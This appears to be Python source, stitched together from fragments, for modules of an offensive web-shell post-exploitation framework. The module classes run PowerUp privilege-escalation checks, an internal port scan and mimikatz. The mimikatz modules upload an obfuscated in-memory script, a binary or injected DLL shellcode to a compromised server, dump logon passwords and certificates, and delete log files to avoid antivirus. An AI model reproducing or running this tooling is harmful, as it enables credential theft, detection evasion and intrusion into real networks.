def __init__(self, password, channel_enc_mode, module_settings, request_object): Invoke_ps_module.__init__(self, password, channel_enc_mode, module_settings, request_object) self.upload_module_object = Upload(password, channel_enc_mode, module_settings, request_object) self.runas_ps_object = Runas_ps(password, channel_enc_mode, module_settings, request_object)
def __init__(self, password, channel_enc_mode, module_settings, request_object): Module.__init__(self, password, channel_enc_mode, module_settings, request_object) self.invoke_ps_module_object = Invoke_ps_module( password, channel_enc_mode, module_settings, request_object) self.invoke_ps_as_module_object = Invoke_ps_module_as( password, channel_enc_mode, module_settings, request_object)
def __init__(self, password, channel_enc_mode, module_settings, request_object): Module.__init__(self, password, channel_enc_mode, module_settings, request_object) self.upload_module_object = Upload(password, channel_enc_mode, module_settings, request_object) self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode, module_settings, request_object) self.runas_module_object = Runas(password, channel_enc_mode, module_settings, request_object) self.invoke_ps_module_object = Invoke_ps_module( password, channel_enc_mode, module_settings, request_object) self.invoke_ps_as_module_object = Invoke_ps_module_as( password, channel_enc_mode, module_settings, request_object)
class Privesc_powerup(Module): _exception_class = PrivescPowerupModuleException short_help = "Run Powerup module to assess all misconfiguration for privesc" complete_help = r""" This module run the Powerup.ps1 script in order to find all possible misconfiguration that can lead to a privilege escalation. The output of this module will be just informative, no automatic privesc exploitation will be performed. Running this module with different users can lead to different results. So it's possible to specify a user to runas this module. If no users are provided this module will run under the application pool running user. Source Code: https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 Usage: #privesc_powerup [username] [password] [domain] [custom_command] Positional arguments: username username of the user to runas the process password password of the user to runas the process domain domain of the user to runas the process custom_command the command to run within the module Default: ';Invoke-AllChecks' Examples: Run powerup as the current user #privesc_powerup Run powerup as a specific local user #privesc_powerup 'user1' 'password1' Run powerup as a specific domain user #privesc_powerup 'user1' 'password1' 'domain' Run powerup with a custom command, i.e. save report as html #privesc_powerup '' '' '' ';Invoke-AllChecks -HTMLReport' """ __default_username = '' __default_password = '' __default_domain = '' __default_custom_command = ';Invoke-AllChecks' def __init__(self, password, channel_enc_mode, module_settings, request_object): Module.__init__(self, password, channel_enc_mode, module_settings, request_object) self.invoke_ps_module_object = Invoke_ps_module( password, channel_enc_mode, module_settings, request_object) self.invoke_ps_as_module_object = Invoke_ps_module_as( password, channel_enc_mode, module_settings, request_object) def __parse_run_args(self, args): args_parser = {k: v for k, v in enumerate(args)} username = args_parser.get(0, self.__default_username) password = args_parser.get(1, self.__default_password) domain = args_parser.get(2, self.__default_domain) custom_command = args_parser.get(3, self.__default_custom_command) return username, password, domain, custom_command def run(self, args): try: username, password, domain, custom_command = self.__parse_run_args( args) if username == '' and password == '': response = self.invoke_ps_module_object.run( ['PowerUp.ps1', custom_command]) else: response = self.invoke_ps_as_module_object.run([ 'PowerUp.ps1', username, password, custom_command, domain ]) parsed_response = self._parse_response(response) except ModuleException as module_exc: parsed_response = str(module_exc) except Exception: parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\ str(traceback.format_exc()) return parsed_response
class Net_portscan(Module): _exception_class = NetPortscanModuleException short_help = "Run a port scan using regular sockets, based (pretty) loosely on nmap" complete_help = r""" This module run the Invoke-Portscan.ps1 script in order to perform a portscan on a host or network. Source Code: https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/Invoke-Portscan.ps1 Usage: #net_portscan hosts [ports] [custom_arguments] Positional arguments: hosts ip or hostnames to scan ranges can be used with "-" separator or CIDR notation ports ports to be scanned different ports can be specified using ',' separator ranges can be used with "-" separator Default: 'Top25' custom_arguments custom arguments for ps1 module Default: ' -T 3 ' Examples: Run default portscan on a subnet #net_portscan 192.168.1.0/24 Run portscan on specific ports #net_portscan 192.168.1.0/24 '445' Run portscan on specific ports and with aggressive mode #net_portscan 192.168.1.0/24 '445' ' -T 5 ' """ __default_ports = 'default' __default_custom_arguments = ' -T 3 ' __appended_code_ps_module = ';Invoke-Portscan -Hosts "%s" %s %s -oN %s' def __init__(self, password, channel_enc_mode, module_settings, request_object): Module.__init__(self, password, channel_enc_mode, module_settings, request_object) self.invoke_ps_module_object = Invoke_ps_module( password, channel_enc_mode, module_settings, request_object) self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode, module_settings, request_object) def __parse_run_args(self, args): if len(args) < 1: raise self._exception_class( '#net_portscan: Not enough arguments. 1 Argument required.\n') args_parser = {k: v for k, v in enumerate(args)} hosts = args_parser.get(0) ports = args_parser.get(1, self.__default_ports) custom_arguments = args_parser.get(2, self.__default_custom_arguments) return hosts, ports, custom_arguments def __gen_appended_code(self, hosts, ports, custom_arguments, output_file): ports = '-TopPorts 25' if ports == 'default' else '-Ports "' + ports + '"' appended_code = self.__appended_code_ps_module % ( hosts, ports, custom_arguments, output_file) return appended_code def run(self, args): try: hosts, ports, custom_arguments = self.__parse_run_args(args) output_file = self._module_settings[ 'env_directory'] + '\\' + random_generator() appended_code = self.__gen_appended_code(hosts, ports, custom_arguments, output_file) self._parse_response( self.invoke_ps_module_object.run( ['Invoke-Portscan.ps1', appended_code])) response = self.exec_cmd_module_object.run( ['type ' + output_file + ' & del /f /q ' + output_file]) parsed_response = self._parse_response(response) except ModuleException as module_exc: parsed_response = str(module_exc) except Exception: parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\ str(traceback.format_exc()) return parsed_response
class Mimikatz(Module): _exception_class = MimikatzModuleException short_help = "Run an offline version of mimikatz directly in memory" complete_help = r""" Authors: @gentilkiwi @PowerShellMafia Links: https://github.com/gentilkiwi/mimikatz https://github.com/PowerShellMafia/PowerSploit/blob/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1 Credits: @phra This module allows you to run mimikatz in a versatile way. Within this module it is possible to run mimikatz in 3 different ways: 'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory; 'exe': the classic mimikatz binary will be uploaded to the server and run with arguments; 'dll': convert mimikatz dll into a position independent shellcode and inject into a remote process. It is recommended to run the ps1 version because it will be obfuscated and run from memory. The exe version will be just dropped as clear and could be catched by av scanners. The dll version is the most stealthy but it doesn't support impersonation atm. Usage: #mimikatz [exec_type] [username] [password] [domain] [custom_command] Positional arguments: exec_type execution type for running mimikatz: 'ps1' will upload and execute the powershell version of mimikatz 'exe' will upload and execute the classic version of binary mimikatz 'dll' will inject converted dll shellcode into a remote process Default: 'ps1' username username of the user to runas the process password password of the user to runas the process domain domain of the user to runas the process custom_command based on exec_type, the custom command could be: - 'ps1' : powershell code to add to the ps1 mimikatz module; - 'exe' : command line arguments to the mimikatz binary; - 'dll' : command line arguments to be executed. Default: 'ps1': ';Invoke-Mimikatz -DumpCreds' 'exe': 'privilege::debug sekurlsa::logonpasswords exit' 'dll': 'privilege::debug sekurlsa::logonpasswords exit' Examples: Run mimikatz as the current user #mimikatz Run mimikatz dll #mimikatz 'dll' Run mimikatz as a specific local user #mimikatz 'ps1' 'user1' 'password1' Run mimikatz as a specific domain user #mimikatz 'ps1' 'user1' 'password1' 'domain' Run exe version of mimikatz as the current user #mimikatz 'exe' Run exe version of mimikatz as a specific user #mimikatz 'exe' 'user1' 'password1' Run mimikatz with a custom command, i.e. dumping cert #mimikatz 'ps1' '' '' '' ';Invoke-Mimikatz -DumpCerts' Run mimikatz binary with a custom command, i.e. coffee :) #mimikatz 'exe' '' '' '' 'coffee exit' """ __default_exec_type = 'ps1' __default_username = '' __default_password = '' __default_domain = '' __default_ps_command = ';Invoke-Mimikatz -DumpCreds' __default_exe_command = 'privilege::debug sekurlsa::logonpasswords exit' def __init__(self, password, channel_enc_mode, module_settings, request_object): Module.__init__(self, password, channel_enc_mode, module_settings, request_object) self.upload_module_object = Upload(password, channel_enc_mode, module_settings, request_object) self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode, module_settings, request_object) self.runas_module_object = Runas(password, channel_enc_mode, module_settings, request_object) self.invoke_ps_module_object = Invoke_ps_module( password, channel_enc_mode, module_settings, request_object) self.invoke_ps_as_module_object = Invoke_ps_module_as( password, channel_enc_mode, module_settings, request_object) self.inject_dll_srdi_module_object = Inject_dll_srdi( password, channel_enc_mode, module_settings, request_object) def __parse_run_args(self, args): args_parser = {k: v for k, v in enumerate(args)} exec_type = args_parser.get(0, self.__default_exec_type) username = args_parser.get(1, self.__default_username) password = args_parser.get(2, self.__default_password) domain = args_parser.get(3, self.__default_domain) custom_command = args_parser.get( 4, self.__default_exe_command if exec_type != 'ps1' else self.__default_ps_command) return exec_type, username, password, domain, custom_command def __lookup_exe_binary(self): if 'mimikatz.exe' in self._module_settings.keys(): bin_path = self._module_settings['mimikatz.exe'] else: exe_path = config.modules_paths + 'exe_modules/mimikatz.exe' remote_upload_path = self._module_settings[ 'env_directory'] + '\\' + random_generator() + '.exe' print '\n\n\nUploading mimikatz binary....\n' upload_response = self._parse_response( self.upload_module_object.run([exe_path, remote_upload_path])) print upload_response self._module_settings['mimikatz.exe'] = remote_upload_path bin_path = remote_upload_path return bin_path def __run_exe_version(self, username, password, domain, custom_command): remote_upload_path = self.__lookup_exe_binary() if username == '': response = self.exec_cmd_module_object.run( ['""' + remote_upload_path + '""' + ' ' + custom_command]) else: response = self.runas_module_object.run([ remote_upload_path + ' ' + custom_command, username, password, domain ]) parsed_response = self._parse_response(response) return parsed_response def __run_dll_version(self, username, custom_command): dll_name = 'powerkatz.dll' exported_function_name = 'powershell_reflective_mimikatz' log_file = self._module_settings[ 'env_directory'] + '\\' + random_generator() exported_function_data = str( ('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le')) if username == '': print '\n\nInjecting converted DLL shellcode into remote process...' response = self.inject_dll_srdi_module_object.run([ dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}', exported_function_name, exported_function_data ]) response = self._parse_response(response) response += '\nDLL injection executed!\n\n\nOutput of mimikatz:\n\n' response += self._parse_response( self.exec_cmd_module_object.run( ['type ' + log_file + ' & del /f /q ' + log_file])) else: raise self._exception_class( '#mimikatz: exec_type "dll" does not support the runas function atm\n' ) parsed_response = self._parse_response(response) return parsed_response def __run_ps_version(self, username, password, domain, custom_command): if username == '': response = self.invoke_ps_module_object.run( ['Invoke-Mimikatz.ps1', custom_command]) else: response = self.invoke_ps_as_module_object.run([ 'Invoke-Mimikatz.ps1', username, password, custom_command, domain ]) parsed_response = self._parse_response(response) return parsed_response def run(self, args): try: exec_type, username, password, domain, custom_command = self.__parse_run_args( args) if exec_type == 'exe': response = self.__run_exe_version(username, password, domain, custom_command) elif exec_type == 'dll': response = self.__run_dll_version(username, custom_command) else: response = self.__run_ps_version(username, password, domain, custom_command) parsed_response = self._parse_response(response) except ModuleException as module_exc: parsed_response = str(module_exc) except Exception: parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\ str(traceback.format_exc()) return parsed_response
class Mimikatz(Module): _exception_class = MimikatzModuleException short_help = "Run an offline version of mimikatz directly in memory" complete_help = r""" This module allows you to run mimikatz in a versatile way. Within this module it is possible to run mimikatz in 2 different way: 'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory; 'exe': the classic mimikatz binary will be uploaded to the server and run with arguments. It is recommended to run the ps1 version because it will be obfuscated and run from memory. The exe version will be just dropped as clear and could be catched by av scanners. Exec_Type can be 'ps1' or 'exe'. Source Code: https://github.com/gentilkiwi/mimikatz https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 Usage: #mimikatz [exec_type] [username] [password] [domain] [custom_command] Positional arguments: exec_type type of running mimikatz. 'ps1' will upload and execute the powershell version of mimikatz 'exe' will upload and execute the classic version of binary mimikatz Default: 'ps1' username username of the user to runas the process password password of the user to runas the process domain domain of the user to runas the process custom_command based on exec_type, the custom command could be: - 'ps1' : powershell code to add to the ps1 mimikatz module; - 'exe' : command line arguments to the mimikatz binary; Default: 'ps1': ';Invoke-Mimikatz -DumpCreds' 'exe': 'privilege::debug sekurlsa::logonpasswords exit' Examples: Run mimikatz as the current user #mimikatz Run mimikatz as a specific local user #mimikatz 'ps1' 'user1' 'password1' Run mimikatz as a specific domain user #mimikatz 'ps1' 'user1' 'password1' 'domain' Run exe version of mimikatz as the current user #mimikatz 'exe' Run exe version of mimikatz as a specific user #mimikatz 'exe' 'user1' 'password1' Run mimikatz with a custom command, i.e. dumping cert #mimikatz 'ps1' '' '' '' ';Invoke-Mimikatz -DumpCerts' Run mimikatz binary with a custom command, i.e. coffee :) #mimikatz 'exe' '' '' '' 'coffee exit' """ __default_exec_type = 'ps1' __default_username = '' __default_password = '' __default_domain = '' __default_ps_command = ';Invoke-Mimikatz -DumpCreds' __default_exe_command = 'privilege::debug sekurlsa::logonpasswords exit' def __init__(self, password, channel_enc_mode, module_settings, request_object): Module.__init__(self, password, channel_enc_mode, module_settings, request_object) self.upload_module_object = Upload(password, channel_enc_mode, module_settings, request_object) self.exec_cmd_module_object = Exec_cmd(password, channel_enc_mode, module_settings, request_object) self.runas_module_object = Runas(password, channel_enc_mode, module_settings, request_object) self.invoke_ps_module_object = Invoke_ps_module( password, channel_enc_mode, module_settings, request_object) self.invoke_ps_as_module_object = Invoke_ps_module_as( password, channel_enc_mode, module_settings, request_object) def __parse_run_args(self, args): args_parser = {k: v for k, v in enumerate(args)} exec_type = args_parser.get(0, self.__default_exec_type) username = args_parser.get(1, self.__default_username) password = args_parser.get(2, self.__default_password) domain = args_parser.get(3, self.__default_domain) custom_command = args_parser.get( 4, self.__default_exe_command if exec_type == 'exe' else self.__default_ps_command) return exec_type, username, password, domain, custom_command def __lookup_exe_binary(self): if 'mimikatz.exe' in self._module_settings.keys(): bin_path = self._module_settings['mimikatz.exe'] else: exe_path = config.modules_paths + 'exe_modules/mimikatz.exe' remote_upload_path = self._module_settings[ 'env_directory'] + '\\' + random_generator() + '.exe' print '\n\n\nUploading mimikatz binary....\n' upload_response = self._parse_response( self.upload_module_object.run([exe_path, remote_upload_path])) print upload_response self._module_settings['mimikatz.exe'] = remote_upload_path bin_path = remote_upload_path return bin_path def __run_exe_version(self, username, password, domain, custom_command): try: remote_upload_path = self.__lookup_exe_binary() if username == '': response = self.exec_cmd_module_object.run( ['""' + remote_upload_path + '""' + ' ' + custom_command]) else: response = self.runas_module_object.run([ remote_upload_path + ' ' + custom_command, username, password, domain ]) parsed_response = self._parse_response(response) except ModuleException as module_exc: parsed_response = str(module_exc) return parsed_response def __run_ps_version(self, username, password, domain, custom_command): if username == '': response = self.invoke_ps_module_object.run( ['Invoke-Mimikatz.ps1', custom_command]) else: response = self.invoke_ps_as_module_object.run([ 'Invoke-Mimikatz.ps1', username, password, custom_command, domain ]) parsed_response = self._parse_response(response) return parsed_response def run(self, args): try: exec_type, username, password, domain, custom_command = self.__parse_run_args( args) if exec_type == 'exe': response = self.__run_exe_version(username, password, domain, custom_command) else: response = self.__run_ps_version(username, password, domain, custom_command) parsed_response = self._parse_response(response) except ModuleException as module_exc: parsed_response = str(module_exc) except Exception: parsed_response = '{{{' + self._exception_class.__name__ + '}}}' + '{{{PythonError}}}\n' +\ str(traceback.format_exc()) return parsed_response